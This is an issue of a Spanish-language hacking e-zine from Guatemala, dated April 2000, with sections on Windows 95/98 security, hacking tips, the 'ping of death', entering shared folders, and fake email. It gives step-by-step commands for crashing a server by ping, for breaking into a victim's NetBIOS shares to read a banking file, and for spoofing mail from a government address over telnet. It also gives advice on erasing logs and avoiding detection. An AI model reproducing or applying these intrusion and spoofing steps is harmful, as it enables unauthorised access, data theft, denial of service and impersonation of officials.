Etime Guatenmala 6
Quincena 6.00 Edición # 6.14.04.2000
Indice (14.04.2000)
- Editorial
- Seguridad en win9X
- Sugerencias para un buen hacking
- El ping de la muerte :)
- Recurso Compartidos (hacking)
- Fake Emails con telnet
- Créditos
Si tienes algún buen tip, truco reportaje, que quieres que lo incluyamos en los futuros tirajes o problemas para recibir esta edición mándalos a: etimegt@intelnet.net.gt
1. Editorial
En esta ocasión no hay mucho que decir.
Solo que agradecemos a muchas personas que se han encargado de retransmitir estas ediciones solo que han puesto de su cosecha cambiando los créditos y los banners es por que rogamos si tu recibes esta edición, recuerdas que pertenece a etimegt un nombre registrado por technodata, bueno ya basta de regaños y pasemos a la edición.
2. Seguridad en Win9X
Como todos sabemos la seguridad en win95/98 es nula, es decir, win95/98 no tiene seguridad por si mismo, un claro ejemplo de esto que es las ventanas que nos piden un password las podemos cerrar pulsando sobre la X o también nos basta con pulsar ctrl+atl+supr, con lo que nos saltaremos esta ventana sin meter ningun password. Por eso para que nuestro ventanas (nombre que se le da a win95/98 tendremos que instalarle algún paquete de seguridad disponible por la red, que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque siempre puedes comprar algún paquete comercial de seguridad, en mi opinión alguna veces una tontera, ya que nos pueden cobrar un precio abusivo y cuando llega la oportunidad de demostrar su calidad nos falla, ya que no hay nada seguro 100%. Proteger nuestro win95/98 es cosa de cada uno pero tranquilidad, que la cosa no es muy difícil, es cuestión de estar atento a las novedades, en otras palabras estar informado.
Ataques Típicos a Nuestro Windows.
Lógicamente seremos muy propensos a ataques tipo DoS (denial of service), como son el LAND, BONK, TEARDROP y por supuesto los famosos nukes, OOB, etc... Para estar protegidos lo que tenemos que hacer es pasarnos por los web's de seguridad o el de la casa Microsoft en los cuales se cuelgan los parches de estos ataques. No siempre funcionan pero nos ahorraran muchos disgustos en muchos casos. La gente suele ser muy propensa a estas cosas porque no esta informada sobre estos ataques y por consiguiente no se instala los parches correspondientes.
Protegiendo Nuestras Acciones.
Esta sección esta enfocada a esconder nuestros actos hacking por Internet. Ya que todo lo que hagamos dejaremos huellas y por desgracia la gente no se entera de esto y deja muchas pistas.
Borrando Nuestras Huellas.
Cuando conectamos a un servidor, este graba lo que hacemos (cuando hemos conectado, como, desde donde y varias cosas mas), por eso hay que tener mucho cuidado.
La mayoría de servidores que hackeemos por Internet serán unix, conviene tener a mano "zappers", son programas que borran nuestras huellas en el servidor. Existen muchos programas para este propósito que funcionan bajo Unix. Solo los tenemos que compilar en el servidor y ejecutarlos. Por desgracia al usar Win95/98 no podemos compilarlos en nuestro ordenador y subirlo por FTP pero algo es algo.
3. Sugerencias para un buen Hacking
Sugerencias Para Un Mejor Hacking.
Aquí hablare sobre algunas ideas que pueden potenciar el hacking en Win95/98 y la creación de nuevas herramientas.
- Programas troyanos que capturen el password del acceso a Internet.
- Programas para IP-Spoof.
- Creación de herramientas de redes para Win95/98.
- Wardialers.
- Programas para atacar otros Win95/98 (DoS).
- Nuevas Suites.
- Programas crackeadores del passwd.
- Programas criptograficos.
- Programas eliminadores de ficheros de forma segura.
- Puertas traseras. (backdorrs)
- Programas de administracion remota.
- Programas DoS para saltarse protecciones.
- Programas que realmente proporcionen seguridad a nuestro sistema.
4. El ping de la muerte :)
Esta técnica no es propia de un Hacker sino de un Lamer (no quiero decir Cracker para no ofender a nadie :) ya que únicamente sirve para tirar un servidor o sea que se desconecta de Internet y esto puede representar grandes perdidas a una empresa. Con esto solo les quiero decir que aunque aquí les explicare no es cuestión que lo uses por Internet atacando servidores.
La utilidad Ping sirve principalmente para saber si un servidor esta activo y además podemos calcular el trafico en la red según el tiempo de su respuesta. Básicamente se le envía un paquete a un servidor y este nos contesta, solo que si se le envía un paquete muy grande puede llegar desordenado, por lo que el servidor pide al origen que le vuelva a enviar una parte o la totalidad del paquete, por lo que se produce un datagrama del ping muy grande y producirá su caída. Para ejecutar este ataque solo tenemos que escribir:
c:\>ping -l 65510 victima.com
Pues esta simple línea es muy destructiva, por lo que tened cuidado y antes de hacer tonterías lee la parte sobre seguridad y como borrar sus huellas.
5. Recursos Compartidos
Como win95/98 NO tiene seguridad nos permite colarnos en el disco duro de otra persona por Internet y lo mejor del caso es que esta técnica nos la proporciona los propios programas del win95/98. Por supuesto no todo es tan sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala configuración del propio usuario al no configurar adecuadamente los recursos compartidos de su red corriendo sobre win95/98.
Para colarnos en el HD de otro ordenador debemos tener nuestro ordenador bien configurado, o sea el compartir recursos bien puesto y también tener el Netbios instalado. Para configurarlo, tenemos que tener activado la opción de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red. SI por el caso la opción esta desactivada simplemente pulsamos el botón de "añadir" y añadimos el servicio "Compartir ficheros e impresoras en redes Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesión" en "Cliente para redes Microsoft". También tiene que estar activado el "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso Telefónico a Redes->Conexión a Inet que usaremos->boton derecho-> propiedades, debiendo estar activada la casilla "conectarse a la red".
Ahora ya podemos ponernos manos a la obra, entonces volvemos a una ventana del MS-DOS y ejecutamos:
c:\>nbtstat -A (IP DE LA VICTIMA)
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
VICTIMAMACHINE <00> UNIQUE Registered
VICTIMAGROUP <00> GROUP Registered
VICTIMAMACHINE <03> UNIQUE Registered
VICTIMAMACHINE <20> UNIQUE Registered
VICTIMAGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
Cuando ejecutamos este comando nos saldrá una tabla como esta y el primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes ver la maquina se llama VICTIMAMACHINE.
Entonces ahora creamos / editamos el archivo LMHOSTS, si por el caso encontraras uno que pone LMHOSTS.SAM no lo toques, poniendo la dirección IP y el nombre de la maquina en cuestión, esto seria de la siguiente forma:
c:\>edit c:\windows\system32\LMHOSTS VICTIMAMACHINE
Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos un comando para añadir el ordenador de la victima a nuestro Netbios y esto seria de la siguiente forma:
c:\>NBTSTAT -R
Ahora nos interesa saber que recursos comparte la victima y esto tampoco nos traerá complicación alguna:
c:\>net view \\VICTIMAMACHINE
Shared resources at \\VICTIMAMACHINE
Sharename Type Comment
-----------------------------------------
BANCO Disk
Y como podemos observar comparte una carpeta llamada BANCO.
Ahora ya podemos operar como si fuese una terminal mas en nuestra red local sobre win95/98. Ya solo nos queda ejecutar el comando que queramos, si por ejemplo queremos ver el contenido, solo tenemos que escribir:
c:\> dir \\VICTIMAMACHINE\BANCO
O para leer cualquier fichero de la carpeta:
c:\> type \\VICTIMAMACHINE\BANCO\CUENTABANCARIA.TXT
Si queremos conectar al recurso compartido de forma grafica (o sea con una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar INICIO->BUSCAR PC y detendremos el PC remoto pero esto solo es posible si hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos llamar, deberemos ejecutar:
c:\>NET USE e: \\MIPC\WINDOWS
Esta técnica solo funciona si la maquina remota ejecuta win95/98 o win 3.11 y además comparte las carpetas sin contraseña en modo "Acceso a nivel compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina para que este autorizada, esto lo conseguiremos con el Regedit, por desgracia los sistemas win95/98 y OSR2 que están ejecutando el Servidor Web Personal de Microsoft desactivan esta posibilidad de acceso remoto tras informar de la conveniencia de hacerlo al usuario, ya que el servidor web obliga a compartir carpetas aun sin tener red local.
Logicamente un usuario que haya tenido el despiste de conectarse a Internet con carpetas compartidas no toma luego medidas de control sobre quien entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser pillados si por ejemplo un usuario ejecuta el programa Netwatch, que muestra los usuarios conectados a nuestra computadora en cada momento y por supuesto el nombre de las computadoras por lo que es aconsejable cambiar el nombre de nuestra computadora usando el Regedit. Si nuestra maquina se llama HACKERNOBO cambiamos todas la cadenas donde aparezca este nombre con el Regedit a un nombre menos sospechoso.
Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra computadora no nos tendremos que preocupar del Netwatch, así conseguiremos una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se dará cuenta de nuestra entrada. También hay que decir que si la VICTIMAMACHINE quiere apagar su computadora le saldrá el mensaje del tipo "hay otros usuarios conectados a su ordenador, si apaga se desconectaran" si ocurre esto seremos pillados.
Decir que el comando Net, dispone de muchos parámetros que nos puede ser útiles y además podemos jugar durante mucho tiempo con ellos :) los cuales son los siguientes:
c:\>net /?
For more information about a specific Microsoft NET command, type the command name followed by /?
(for example, NET VIEW /?).
- NET CONFIG Displays your current workgroup settings.
- NET DIAG Runs the Microsoft Network Diagnostics program to display diagnostic information about your network.
- NET HELP Provides information about commands and error messages.
- NET INIT Loads protocol and network-adapter drivers without binding them to Protocol Manager.
- NET LOGOFF Breaks the connection between your computer and the shared resources to which it is connected.
- NET LOGON Identifies you as a member of a workgroup.
- NET PASSWORD Changes your logon password.
- NET PRINT Displays information about print queues and controls print jobs.
- NET START Starts services.
- NET STOP Stops services.
- NET TIME Displays the time on or synchronizes your computer's clock with the clock on a Microsoft Windows for Workgroups, Windows NT, Windows 95, or NetWare time server.
- NET USE Connects to or disconnects from a shared resource or displays information about connections.
- NET VER Displays the type and version number of the workgroup redirector you are using.
- NET VIEW Displays a list of computers that share resources or a list of shared resources on a specific computer. The command was completed successfully.
Pues aquí tienes todos los parámetros disponibles del comando Net, por lo que solo nos queda jugar un rato para saber que es cada cosa. No es divertido si lo explico todo.
6. Fake Mail Con Telnet
Esta técnica nos ayuda a suplantar la dirección de correo electrónica que Queramos J. La verdad es que tiene pocos usos, en mi opinión debido a una serie de razones pero siempre puede servir para gastar una buena broma enviando aun amigo un mail del director de la Universidad diciendo que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la Nacional Civil. (bueno que esos burros ni escribir saben)
La verdad es que es muy sencillo de hacer pero por supuesto habrá que tomar unas ciertas medidas de seguridad, que ya explique. Lo primero que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del Telnet y donde pone "puerto" en vez de poner el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos a que nos conectemos a ese puerto, cuando conectemos nos saldrá un mensaje y esta esperando a que pulsemos alguna tecla:
220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
[d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)
Muchas veces lo que podemos hacer es escribir "help" y saldrán todos los comandos, también podemos escribir "echo" y la maquina nos contestara que esta lista. Para escribir un mail hay que seguir una serie de pasos:
mail from:webmaster@ministeriopublico.gov.gt <- ponemos de donde viene.
El servidor nos contesta:
250 < webmaster@ministeriopublico.gov.gt > ... Sender Okay
Ahora escribimos:
rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.
El servidor nos contesta:
250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay
Ahora escribimos:
data
El servidor nos contesta:
354 Enter mail, end with "." on a line by itself
Ahora escribimos:
To: nob_ody@xxxxxxxx.com
From: gc.uco@mad.servicom.es
Subject: Te querremos!!
Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te
querremos fichar para el departamento.
Direccion General de
Ministerio publico
. <- para terminar el mail.
El servidor nos contesta:
250 Mail accepted
Ahora escribimos:
quit <- ya esta todo listo :)
Pues ves como es realmente simple!! Pero antes de empezar a jugar con esta tecnica tenemos que asegurarnos que el servidor de mail no registra nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a alguna cuenta anónima que tengamos. Si vemos que en la cabecera del mail sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet sobre servidores que permiten hacer esto.
7. Distribución y Edición
Webmaster : T3ChNoDAt-@
Editores: T3ChNoDAt-@
Esta es una publicación 100% chapina todos los derechos reservados a T3ChNoDat-@ S.A. E-TimeGt es un nombre registrado por
T3ChNoDat-@ S.A. Guatemala Abril del 2000